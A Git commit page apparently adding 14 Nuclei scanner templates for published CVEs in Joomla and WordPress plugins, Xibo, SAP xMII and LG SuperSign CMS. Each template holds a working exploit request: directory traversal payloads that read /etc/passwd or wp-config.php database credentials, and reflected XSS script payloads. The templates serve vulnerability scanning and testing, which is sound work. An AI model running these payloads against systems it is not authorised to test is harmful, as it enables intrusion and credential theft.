daffainfo
/
my-nuclei-templates
mirror of https://github.com/daffainfo/my-nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adding new template

main
daffainfo 2021-08-19 17:29:24 +07:00
parent c6aa0ef7a0
commit c6dbad9e02
14 changed files with 387 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
CVE-2008-4764.yaml Executable file
View File

@ -0,0 +1,27 @@
id: CVE-2008-4764
info:
name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
reference: |
- https://www.exploit-db.com/exploits/5435
- https://www.cvedetails.com/cve/CVE-2008-4764
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-0944.yaml Executable file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0944
info:
name: Joomla! Component com_jcollection - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/11088
- https://www.cvedetails.com/cve/CVE-2010-0944
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1979.yaml Executable file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1979
info:
name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12088
- https://www.cvedetails.com/cve/CVE-2010-1979
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1983.yaml Executable file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1983
info:
name: Joomla! Component redTWITTER 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php
reference: |
- https://www.exploit-db.com/exploits/12055
- https://www.cvedetails.com/cve/CVE-2010-1983
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2259.yaml Executable file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2259
info:
name: Joomla! Component com_bfsurvey - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/10946
- https://www.cvedetails.com/cve/CVE-2010-2259
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2682.yaml Executable file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2682
info:
name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/14017
- https://www.cvedetails.com/cve/CVE-2010-2682
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2011-4804.yaml Executable file
View File

@ -0,0 +1,27 @@
id: CVE-2011-4804
info:
name: Joomla! Component com_kp - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/36598
- https://www.cvedetails.com/cve/CVE-2011-4804
tags: cve,cve2011,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

28
CVE-2013-5979.yaml Executable file
View File

@ -0,0 +1,28 @@
id: CVE-2013-5979
info:
name: Xibo 1.2.2/1.4.1 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/26955
- https://www.cvedetails.com/cve/CVE-2013-5979
- https://bugs.launchpad.net/xibo/+bug/1093967
tags: cve,cve2013,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

25
CVE-2014-4940.yaml Executable file
View File

@ -0,0 +1,25 @@
id: CVE-2014-4940
info:
name: WordPress Plugin Tera Charts - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
reference: https://www.cvedetails.com/cve/CVE-2014-4940
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

29
CVE-2014-5368.yaml Executable file
View File

@ -0,0 +1,29 @@
id: CVE-2014-5368
info:
name: WordPress Plugin WP Content Source Control - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
reference: |
- https://www.exploit-db.com/exploits/39287
- https://www.cvedetails.com/cve/CVE-2014-5368
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200

33
CVE-2016-1000139.yaml Executable file
View File

@ -0,0 +1,33 @@
id: CVE-2016-1000139
info:
name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
tags: cve,cve2016,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain);</script><"'
- 'input type="text" name="ContactId"'
condition: and
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
CVE-2016-1000146.yaml Executable file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000146
info:
name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

27
CVE-2016-2389.yaml Executable file
View File

@ -0,0 +1,27 @@
id: CVE-2016-2389
info:
name: SAP xMII 15.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
reference: |
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
- https://www.cvedetails.com/cve/CVE-2016-2389
tags: cve,cve2016,lfi,sap
requests:
- method: GET
path:
- "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2018-16288.yaml Executable file
View File

@ -0,0 +1,27 @@
id: CVE-2018-16288
info:
name: LG SuperSign EZ CMS 2.5 - Local File Inclusion
author: daffainfo
severity: high
description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
reference: |
- https://www.exploit-db.com/exploits/45440
- https://www.cvedetails.com/cve/CVE-2018-16288
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200